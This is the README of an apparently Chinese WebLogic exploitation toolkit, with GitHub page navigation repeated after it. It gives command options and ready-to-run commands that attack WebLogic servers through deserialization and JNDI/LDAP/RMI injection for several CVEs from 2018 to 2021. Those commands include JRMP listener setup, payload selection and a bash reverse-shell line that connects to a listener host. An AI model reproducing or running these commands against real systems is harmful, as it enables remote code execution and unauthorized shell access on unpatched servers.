简介

工具部分代码借鉴前辈的weblogic_cmd,属于二次再造轮子，部分功能暂未完善,后续将继续往上加功能

公众号:8ypass

下载方式:公众号回复 weblogic

//特殊时期 无后门 随便测 不放心自己反编译一下自己看

weblogic综合利用工具使用

java -jar weblogic tools.jar -help

 -c <arg>         execute commond 要执行的命令
 -H <arg>         Remote Host 目标主机
 -help            list options 
 -https <arg>     https需选择此选项 T3S 目标是https选择此项
 -jndi <arg>      JNDI地址 weblogic JNDI注入选这项填入地址
 -Jport <arg>     JRMPListener监听  输入监听端口,在本机开启JRMPListener输
 -os <arg>        window/linux 目标主机系统 不选默认为window
 -P <arg>         Remote Port 目标主机端口
 -payload <arg>   payload grep 选择payload
 -payloads        list payloads 遍历可用payload
 -RMIH <arg>      JRMPClient Host JRMP服务端地址
 -RMIP <arg>      JRMPClient Port JRMP服务端端口

更新记录

增加CVE-2021-2394

列出可控payloads

java -jar weblogic.jar -payloads

启动JRMPListener

java -jar weblogic.jar -Jport 8888 -payload cc6 -c calc.exe

启动LDAP/RMI

LDAP
java -jar weblogic.jar -jndistart -Jport 8888 -jndildap -codeurl http://127.0.0.1/#wlc618

RMI
java -jar weblogic.jar -jndistart -Jport 8888 -jndirmi -codeurl http://127.0.0.1/

高版本jndi注入 ldap

java -jar weblogic\ tools.jar -jndistart -Jport 9922 -jndildap -highjdk -os linux -c 'open /System/Applications/Calculator.app'


java -jar weblogic\ tools.jar -jndistart -Jport 9922 -jndildap -highjdk -os linux -c 'bash -i >& /dev/tcp/192.168.0.112/8888 0>&1'

cve-2018-3245

java -jar weblogic tools.jar -Jport 8888 -payload cc6 -c calc.exe
0
java -jar weblogic tools.jar -H 192.168.0.112 -P 7001 -RMIH 192.168.0.110 -RMIP 8888 -payload 20183245

cve-2018-3191

rmi:
java -jar weblogic tools.jar -jndi rmi://192.168.0.110:8888/wlc -payload 20183191 -H 192.168.0.112 -P 7001
ldap:
java -jar weblogic tools.jar -jndi ldap://192.168.0.110:9922/232 -payload 20183191 -H 192.168.0.112 -P 7001

CVE-2020-14645

java -jar weblogic.jar -payload 202014645 -H 127.0.0.1 -P 7001 -jndi ldap://127.0.0.1:8889/#wlc

java -jar weblogic.jar -payload 202014645 -H 127.0.0.1 -P 7001 -jndi rmi://127.0.0.1/wlc

CVE-2020-14756

java -jar weblogic.jar -payload 202014645 -H 127.0.0.1 -P 7001 -os window -mvel xxx

cve-2020-2551

rmi:

java -jar weblogic tools.jar -H 192.168.0.113 -P 7001 -payload 20202551 -jndi rmi://192.168.0.113:8888/wlc

ldap:

java -jar weblogic tools.jar -H 192.168.0.113 -P 7001 -payload 20202551 -jndi ldap://192.168.0.113/#123

cve-2021-2394

java -jar weblogic tools.jar -H 127.0.0.1 -P 7001 -payload 20212394 -jndi rmi://1.1.1.1:8888/wlc

Name		Name	Last commit message	Last commit date
Latest commit History 9 Commits
README.md		README.md

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

README.md

README.md

Repository files navigation

简介

weblogic综合利用工具使用

更新记录

列出可控payloads

启动JRMPListener

启动LDAP/RMI

高版本jndi注入 ldap

cve-2018-3245

cve-2018-3191

CVE-2020-14645

CVE-2020-14756

cve-2020-2551

cve-2021-2394

About

Releases

Packages

8ypass/weblogicExploit

Folders and files

Latest commit

History

README.md

README.md

Repository files navigation

简介

weblogic综合利用工具使用

更新记录

列出可控payloads

启动JRMPListener

启动LDAP/RMI

高版本jndi注入 ldap

cve-2018-3245

cve-2018-3191

CVE-2020-14645

CVE-2020-14756

cve-2020-2551

cve-2021-2394

About

Resources

Stars

Watchers

Forks

Releases

Packages 0

Packages